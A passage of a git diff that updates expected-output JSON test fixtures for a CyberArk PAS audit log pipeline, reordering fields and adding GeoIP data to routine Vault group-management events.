a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,28 +38,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237014100Z", + "ingested": "2021-12-14T14:42:06.479337005Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -82,6 +79,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -99,28 +101,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237022200Z", + "ingested": "2021-12-14T14:42:06.479339408Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -136,6 +142,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -153,28 +164,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237027700Z", + "ingested": "2021-12-14T14:42:06.479339814Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -190,6 +205,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -207,14 +227,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237031800Z", + "ingested": "2021-12-14T14:42:06.479340155Z", "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json index a1dd3cc9ca8..62961cbca46 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,28 +39,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577462300Z", + "ingested": "2021-12-14T14:42:06.913524500Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -101,28 +103,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577470900Z", + "ingested": "2021-12-14T14:42:06.913527018Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -138,6 +144,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -156,28 +167,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577476600Z", + "ingested": "2021-12-14T14:42:06.913527509Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -193,6 +208,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -211,28 +231,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577481900Z", + "ingested": "2021-12-14T14:42:06.913527900Z", "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -248,6 +272,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -266,28 +295,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577487200Z", + "ingested": "2021-12-14T14:42:06.913528387Z", "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -303,6 +336,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -321,28 +359,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577492900Z", + "ingested": "2021-12-14T14:42:06.913528780Z", "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -358,6 +400,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -376,28 +423,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577498200Z", + "ingested": "2021-12-14T14:42:06.913529154Z", "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -413,6 +464,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -431,28 +487,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577503500Z", + "ingested": "2021-12-14T14:42:06.913529531Z", "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -468,6 +528,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -486,28 +551,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577508700Z", + "ingested": "2021-12-14T14:42:06.913529897Z", "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -523,6 +592,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -542,28 +616,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577514100Z", + "ingested": "2021-12-14T14:42:06.913530354Z", "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -579,6 +657,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -598,28 +681,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577519400Z", + "ingested": "2021-12-14T14:42:06.913530720Z", "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group 